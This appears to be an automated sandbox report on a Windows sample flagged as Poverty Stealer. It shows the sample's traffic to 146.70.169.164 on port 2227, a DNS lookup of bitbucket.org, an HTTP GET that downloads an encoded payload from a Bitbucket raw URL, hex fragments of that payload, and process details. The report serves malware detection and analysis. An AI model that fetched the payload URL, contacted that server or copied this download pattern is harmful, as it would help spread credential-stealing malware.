                                        Jul 3, 2024 18:02:18.592077017 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.640122890 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.640217066 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.687982082 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.688055038 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.739921093 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.740124941 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.787894011 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.788503885 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.835880995 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.836540937 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.883853912 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.884675980 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.931907892 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.932506084 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:18.979896069 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:18.980191946 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.027915955 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.027961969 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.075949907 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.076020002 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.127949953 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.128062010 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.179799080 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.179919958 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.236052990 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.236105919 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.284065962 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.284136057 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.331939936 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.332078934 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.384383917 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.384516001 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.431982994 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.432104111 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.479963064 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.480073929 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.528281927 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.528428078 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.576214075 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.576317072 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.624176025 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.624272108 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.672027111 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.672135115 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.720232010 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.720336914 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.768106937 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.768158913 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.820543051 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.820599079 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.871917963 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.872045994 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.923906088 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.924026012 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:19.971965075 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:19.972104073 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.020036936 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.020195961 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.067899942 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.068006039 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.115921021 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.116048098 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.163933039 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.164074898 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.211914062 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.212060928 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.259951115 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.260085106 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.313441038 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.313621998 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.359998941 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.360085011 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.408094883 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.408191919 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.455996990 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.456151962 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.503948927 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.504014969 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.555893898 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.556130886 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.603852987 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.604574919 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.651957989 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.652184010 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.699933052 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.700061083 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.748174906 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.748301029 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.795944929 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.796036005 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.847955942 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.848234892 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.899907112 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.900008917 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.947930098 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.947990894 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:20.995898962 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:20.996037006 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.043931961 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.044018030 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.091937065 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.092057943 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.143855095 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.144020081 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.192017078 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.192137957 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.243949890 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.244096994 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.291874886 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.292051077 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.353106976 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.353287935 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.399847984 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.399923086 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.447895050 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.448018074 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.500612974 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.500699043 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.547907114 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.548122883 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.595907927 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.596014977 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.643907070 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.644031048 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.692095041 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.692444086 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.743978977 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.744132042 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.791912079 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.791985989 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.840145111 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.840289116 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.889456034 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.889585972 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.937273979 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.937520981 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:21.983915091 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:21.984021902 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:22.031914949 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:22.031996012 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:22.080465078 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:22.080535889 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:22.127916098 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:22.128068924 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:22.177383900 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:22.177537918 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:22.225140095 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:22.225265026 CEST497072227192.168.2.7146.70.169.164
                                        Jul 3, 2024 18:02:22.228907108 CEST222749707146.70.169.164192.168.2.7
                                        Jul 3, 2024 18:02:22.231328964 CEST222749707146.70.169.164192.168.2.7
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 3, 2024 18:01:30.988043070 CEST5188053192.168.2.71.1.1.1
                                        Jul 3, 2024 18:01:30.996522903 CEST53518801.1.1.1192.168.2.7
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jul 3, 2024 18:01:30.988043070 CEST192.168.2.71.1.1.10x6a9aStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jul 3, 2024 18:01:30.996522903 CEST1.1.1.1192.168.2.70x6a9aNo error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)false
                                        • bitbucket.org
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.749705104.192.141.14436500C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                                        TimestampBytes transferredDirectionData
                                        2024-07-03 16:01:31 UTC155OUTGET /fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee HTTP/1.1
                                        Accept: */*
                                        User-Agent: Chrome/95.0.4638.54
                                        Host: bitbucket.org
                                        2024-07-03 16:01:32 UTC3109INHTTP/1.1 200 OK
                                        server: envoy
                                        x-usage-quota-remaining: 998333.127
                                        vary: Authorization, Accept-Language, Origin, Accept-Encoding
                                        x-usage-request-cost: 1686.10
                                        Cache-Control: max-age=900
                                        Content-Type: text/plain
                                        x-b3-traceid: c2264b093f093e7b
                                        x-usage-output-ops: 0
                                        x-used-mesh: False
                                        x-dc-location: Micros-3
                                        content-security-policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake. [TRUNCATED]
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Date: Wed, 03 Jul 2024 16:01:31 GMT
                                        x-usage-user-time: 0.032528
                                        x-usage-system-time: 0.000055
                                        x-served-by: 823f7f7f59ff
                                        x-envoy-upstream-service-time: 77
                                        content-language: en
                                        x-view-name: bitbucket.apps.repo2.views.filebrowse_raw
                                        x-b3-spanid: c2264b093f093e7b
                                        Accept-Ranges: bytes
                                        etag: "9cbc4bb3e3be8bf2d9cb84a3ea442b04"
                                        x-static-version: 6465b99ab21b
                                        x-render-time: 0.0680842399597168
                                        Connection: close
                                        x-usage-input-ops: 72
                                        last-modified: Wed, 03 Jul 2024 09:13:19 GMT
                                        x-version: 6465b99ab21b
                                        x-request-count: 3740
                                        x-frame-options: SAMEORIGIN
                                        X-Cache-Info: caching
                                        Content-Length: 40280
                                        2024-07-03 16:01:32 UTC2823INData Raw: 74 76 51 71 7d 7d 2f 7d 7d 7d 7d 65 7d 7d 7d 7d 40 40 38 7d 7d 6c 47 7d 7d 7d 7d 7d 7d 7d 7d 7d 71 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 7d 32 7d 7d 7d 7d 7d 34 46 55 47 34 7d 54 7d 4e 6e 69 42 47 7b 74 2f 30 48 76 7e 48 50 2d 59 7b 57 2d 4d 39 4e 2d 4d 66 54 69 7e 6e 48 42 4d 35 56 44 63 7b 49 3e 73 7b 59 44 77 34 47 3c 77 34 47 72 65 39 74 69 7e 31 56 3e 7e 75 55 64 71 30 6b 6a 7d 7d 7d 7d 7d 7d 7d 7d 7d 64 51 64 3c 65 65 52 4d 5a 70 76 36 35 53 5a 31 45 55 42 2f 39 78 5a 74 68 2f 76 51 58 53 5a 31 45 4e 66 66 58 78 50 77 5a 70 76 36 35 53 5a 4c 45 68 42 2f 39 78 57 64 68 7e 76 51 6e 53 5a 31 46 7d 2f 2d 31 77 52 32 5a 70 76 31 6a 50 7c 32 49 55 42 2f 39
                                        Data Ascii: tvQq}}/}}}}e}}}}@@8}}lG}}}}}}}}}q}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}2}}}}}4FUG4}T}NniBG{t/0Hv~HP-Y{W-M9N-MfTi~nHBM5VDc{I>s{YDw4G<w4Gre9ti~1V>~uUdq0kj}}}}}}}}}dQd<eeRMZpv65SZ1EUB/9xZth/vQXSZ1ENffXxPwZpv65SZLEhB/9xWdh~vQnSZ1F}/-1wR2Zpv1jP|2IUB/9
                                        2024-07-03 16:01:32 UTC10568INData Raw: 66 32 33 72 52 49 39 45 6c 59 21 4a 3e 69 47 7d 7d 48 2d 7b 30 78 52 4b 69 7d 47 7d 7d 36 6b 47 47 7d 7d 7d 70 54 57 33 71 48 65 7d 7d 49 40 7d 70 54 58 78 57 48 65 7d 7d 2f 38 7d 34 72 71 48 4d 49 75 77 57 4a 75 77 4b 64 30 78 72 64 37 46 6b 4a 71 58 6c 75 76 7b 4f 36 68 7b 7d 7d 66 42 4f 42 49 65 7d 7d 69 54 6e 38 69 56 74 3c 49 39 7c 76 4d 3c 6a 72 42 64 4f 65 49 4f 7d 7d 69 70 65 66 70 34 66 59 4f 72 7d 7d 69 56 6f 36 69 69 47 7d 7d 63 6c 59 21 48 37 69 7d 7d 7d 49 31 33 57 36 46 46 21 40 40 21 7b 40 4d 78 65 2f 77 48 31 42 4f 6e 4c 4d 7d 63 6e 72 46 73 64 3e 46 71 7d 4a 75 32 75 75 69 56 78 58 30 77 75 58 76 5a 7e 6b 21 4a 73 6b 57 7d 7d 49 40 7b 3e 48 46 3e 30 70 4f 56 78 49 38 37 4f 2f 59 69 7d 7d 69 78 7d 44 64 66 51 7d 69 56 77 64 37 2d 6e 38 69
                                        Data Ascii: f23rRI9ElY!J>iG}}H-{0xRKi}G}}6kGG}}}pTW3qHe}}I@}pTXxWHe}}/8}4rqHMIuwWJuwKd0xrd7FkJqXluv{O6h{}}fBOBIe}}iTn8iVt<I9|vM<jrBdOeIO}}ipefp4fYOr}}iVo6iiG}}clY!H7i}}}I13W6FF!@@!{@Mxe/wH1BOnLM}cnrFsd>Fq}Ju2uuiVxX0wuXvZ~k!JskW}}I@{>HF>0pOVxI87O/Yi}}ix}DdfQ}iVwd7-n8i
                                        2024-07-03 16:01:32 UTC5816INData Raw: 51 7d 7e 4f 7d 40 58 77 65 2d 65 7d 7d 49 75 78 2f 49 30 78 30 49 30 33 2f 3e 4f 54 2f 74 2d 3e 4d 49 71 49 6c 72 46 72 7d 71 69 4c 66 39 69 54 66 35 7d 6e 66 32 69 4c 66 35 6f 55 71 36 71 30 7b 7d 7d 63 64 46 45 57 7d 44 7b 6b 6c 72 45 5a 72 34 66 63 6c 76 2d 63 6c 74 46 74 4f 58 47 65 7d 7d 66 4d 6c 72 45 59 6c 74 46 73 6e 7b 65 7e 6a 72 46 74 50 35 7d 7d 7d 7d 69 54 66 53 69 70 47 7d 4e 72 2f 47 33 30 2f 7d 33 3e 7e 3c 4a 7b 7c 49 30 33 30 3e 4f 4b 7b 49 30 78 30 71 65 63 6a 72 46 73 6c 72 42 63 64 34 63 7b 30 7b 53 3e 66 40 31 4a 52 7b 2f 3e 66 40 33 48 4d 64 37 35 66 40 34 54 6e 39 7e 3c 6a 7d 7c 54 66 39 65 7b 7d 49 75 78 30 49 30 75 2f 73 65 49 6a 72 71 59 6c 72 45 58 69 73 69 4c 66 37 64 70 7d 71 7e 56 7d 7d 7d 21 21 72 7d 77 7c 47 40 47 54 44 72
                                        Data Ascii: Q}~O}@Xwe-e}}Iux/I0x0I03/>OT/t->MIqIlrFr}qiLf9iTf5}nf2iLf5oUq6q0{}}cdFEW}D{klrEZr4fclv-cltFtOXGe}}fMlrEYltFsn{e~jrFtP5}}}}iTfSipG}Nr/G30/}3>~<J{|I030>OK{I0x0qecjrFslrBcd4c{0{S>f@1JR{/>f@3HMd75f@4Tn9~<j}|Tf9e{}Iux0I0u/seIjrqYlrEXisiLf7dp}q~V}}}!!r}w|G@GTDr
                                        2024-07-03 16:01:32 UTC10568INData Raw: 40 40 21 53 74 40 33 78 38 49 5a 30 4f 2d 65 7d 7d 40 39 46 40 44 46 47 5a 39 4b 42 40 31 34 56 6c 36 6e 70 57 40 40 39 46 49 38 3e 45 77 34 56 4c 78 2d 6e 76 49 21 59 64 37 66 49 64 3e 46 7d 7d 49 30 30 69 36 70 40 37 40 40 38 70 54 53 63 64 21 7d 65 70 48 75 2f 63 7d 7d 63 35 63 7d 69 7d 7d 6f 48 30 38 70 40 40 49 75 78 34 47 33 33 34 7d 7d 21 65 6a 7d 69 7d 7d 70 39 31 63 7e 48 2f 44 75 7d 7d 40 33 78 34 36 65 40 58 40 40 21 64 58 7d 59 6c 76 46 49 6e 74 45 64 4f 4f 40 56 40 40 34 6e 4c 39 7d 7b 51 63 64 70 73 4a 75 33 4f 36 6b 46 57 40 40 39 3e 58 30 78 7d 7e 7d 7d 7d 7d 69 6e 4c 58 7d 64 68 72 2d 58 7d 7d 7d 7d 7d 4a 75 78 47 49 75 78 69 47 32 78 71 7d 69 6e 4c 31 7d 7b 4f 31 69 72 7d 7d 70 38 76 49 68 7b 7d 7d 7e 4f 63 77 7e 56 7d 7d 7d 21 33 47 2f
                                        Data Ascii: @@!St@3x8IZ0O-e}}@9F@DFGZ9KB@14Vl6npW@@9FI8>Ew4VLx-nvI!Yd7fId>F}}I00i6p@7@@8pTScd!}epHu/c}}c5c}i}}oH08p@@Iux4G334}}!ej}i}}p91c~H/Du}}@3x46e@X@@!dX}YlvFIntEdOO@V@@4nL9}{QcdpsJu3O6kFW@@9>X0x}~}}}}inLX}dhr-X}}}}}JuxGIuxiG2xq}inL1}{O1ir}}p8vIh{}}~Ocw~V}}}!3G/
                                        2024-07-03 16:01:32 UTC5816INData Raw: 58 49 76 78 38 76 34 54 39 64 69 70 64 7b 4f 4c 31 21 69 54 6c 21 4f 4c 44 63 69 56 3e 47 45 70 40 40 33 38 7d 57 45 4b 78 49 76 33 30 49 75 33 53 48 44 53 70 48 64 75 7b 7d 7d 63 64 21 57 71 70 47 52 69 7d 7d 7d 63 6c 57 38 68 4f 7d 4f 4c 66 38 7d 21 32 66 34 54 66 64 69 54 6e 40 7d 21 32 44 57 65 70 54 4e 38 63 64 37 3e 7c 7d 57 21 32 48 7b 65 7d 7b 71 7d 7d 49 58 73 72 49 30 33 34 75 6f 49 6a 39 56 40 40 49 30 33 34 36 6a 4e 32 40 40 21 6c 74 46 57 70 54 4f 71 58 7d 7d 75 7d 7d 69 53 75 53 7c 54 31 21 69 56 6f 75 6f 48 4f 39 56 40 40 49 38 37 4f 45 46 42 40 40 34 54 6e 40 7d 21 32 48 64 4b 7d 7b 71 7d 7d 49 58 73 35 49 38 35 71 36 65 56 32 40 40 21 6c 5a 55 48 2d 39 56 40 40 49 30 33 38 64 37 3c 65 7e 71 7d 66 7d 7d 63 6c 66 6a 4d 6c 5a 4c 64 4f 6c 56
                                        Data Ascii: XIvx8v4T9dipd{OL1!iTl!OLDciV>GEp@@38}WEKxIv30Iu3SHDSpHdu{}}cd!WqpGRi}}}clW8hO}OLf8}!2f4TfdiTn@}!2DWepTN8cd7>|}W!2H{e}{q}}IXsrI034uoIj9V@@I0346jN2@@!ltFWpTOqX}}u}}iSuS|T1!iVouoHO9V@@I87OEFB@@4Tn@}!2HdK}{q}}IXs5I85q6eV2@@!lZUH-9V@@I038d7<e~q}f}}clfjMlZLdOlV
                                        2024-07-03 16:01:32 UTC4689INData Raw: 6b 7d 7d 7d 54 69 66 3e 50 3e 7e 76 56 71 77 72 48 2d 68 72 4c 2d 49 7d 4a 6a 77 71 36 69 63 76 5a 64 71 4f 7d 7d 7d 7d 7d 6c 73 7b 70 2d 7e 76 59 7c 78 72 50 42 32 35 74 45 78 6e 30 3e 77 30 36 69 63 76 4b 6f 49 76 4b 6f 49 76 4b 64 71 4f 7d 7d 7d 7d 54 69 66 76 5a 3e 78 6a 7b 3e 32 76 55 44 64 4f 47 6a 78 2f 6e 63 47 7d 7d 7d 63 71 7d 3e 7d 7d 55 7d 7e 57 7d 42 57 7b 4e 7d 7d 7d 7d 7d 7d 7d 4f 42 4e 76 53 42 63 4b 7d 7d 63 47 7d 42 47 7b 31 7d 7e 57 7d 42 7d 7d 50 7d 7d 7d 7d 7d 7d 7d 57 2f 74 69 5a 6e 64 75 32 6e 5a 47 35 71 75 6a 64 72 65 76 7e 7d 7d 7d 7d 7d 64 7d 58 2f 4a 2f 30 6e 74 7c 33 6f 64 4c 48 7c 4d 6e 4b 3e 77 7c 7d 7d 7d 7d 7d 72 47 7b 50 7d 7e 57 7d 3e 71 7d 7d 7d 7d 7d 7d 78 7d 7b 6f 7d 7e 75 7d 44 7d 7b 33 7d 7e 38 7d 2d 47 7b 52 7d 66
                                        Data Ascii: k}}}Tif>P>~vVqwrH-hrL-I}Jjwq6icvZdqO}}}}}ls{p-~vY|xrPB25tExn0>w06icvKoIvKoIvKdqO}}}}TifvZ>xj{>2vUDdOGjx/ncG}}}cq}>}}U}~W}BW{N}}}}}}}OBNvSBcK}}cG}BG{1}~W}B}}P}}}}}}}W/tiZndu2nZG5qujdrev~}}}}}d}X/J/0nt|3odLH|MnK>w|}}}}}rG{P}~W}>q}}}}}}x}{o}~u}D}{3}~8}-G{R}f


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Target ID:0
                                        Start time:12:00:33
                                        Start date:03/07/2024
                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe"
                                        Imagebase:0x770000
                                        File size:578'048 bytes
                                        MD5 hash:DA4B6F39FC024D2383D4BFE7F67F1EE1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:1.2%
                                          Dynamic/Decrypted Code Coverage:23.5%
                                          Signature Coverage:7.7%
                                          Total number of Nodes:1432
                                          Total number of Limit Nodes:85
                                          execution_graph 145360 785d29 145370 785d32 145360->145370 145361 78c4b7 145363 785f2e 145364 785fdc 145363->145364 145365 786006 145363->145365 145634 7d4870 15 API calls 145364->145634 145635 7d4870 15 API calls 145365->145635 145370->145363 145383 785ffe 145370->145383 145632 771d90 15 API calls 145370->145632 145633 771de0 20 API calls 145370->145633 145371 7862fd 145638 7d4870 15 API calls 145371->145638 145372 786327 145639 7d4870 15 API calls 145372->145639 145373 786250 145373->145371 145373->145372 145377 786562 145379 786639 145377->145379 145380 78660f 145377->145380 145643 7d4870 15 API calls 145379->145643 145642 7d4870 15 API calls 145380->145642 145383->145361 145383->145373 145392 78631f 145383->145392 145636 771d90 15 API calls 145383->145636 145637 771de0 20 API calls 145383->145637 145386 786958 145647 7d4870 15 API calls 145386->145647 145387 78692e 145646 7d4870 15 API calls 145387->145646 145388 786880 145388->145386 145388->145387 145390 786b93 145395 786c6b 145390->145395 145396 786c41 145390->145396 145392->145377 145398 786631 145392->145398 145640 771d90 15 API calls 145392->145640 145641 771de0 20 API calls 145392->145641 145651 7d4870 15 API calls 